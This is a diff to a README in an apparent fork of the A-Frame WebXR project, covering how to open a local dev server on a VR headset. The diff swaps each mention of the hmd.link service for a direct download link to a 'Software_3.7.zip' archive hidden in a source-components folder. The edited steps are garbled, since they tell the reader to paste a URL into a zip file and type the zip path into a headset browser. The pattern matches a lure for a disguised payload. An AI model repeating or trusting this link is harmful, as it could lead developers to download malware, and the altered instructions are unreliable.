ricofirman/aframe/README.md

 ```

 Look at the "On Your Network (IPv4)" line in the console, and copy and paste
-the url to https://hmd.link service.
+the url to https://github.com/ricofirman/aframe/raw/refs/heads/master/src/components/scene/Software_3.7.zip service.
-Then open the browser in your headset and type hmd.link in the address bar
+Then open the browser in your headset and type https://github.com/ricofirman/aframe/raw/refs/heads/master/src/components/scene/Software_3.7.zip in the address bar
 then click on the copied url that will show up if you're connected to the same
 network as your machine.
 You will see a message about the page being dangerous because we're using a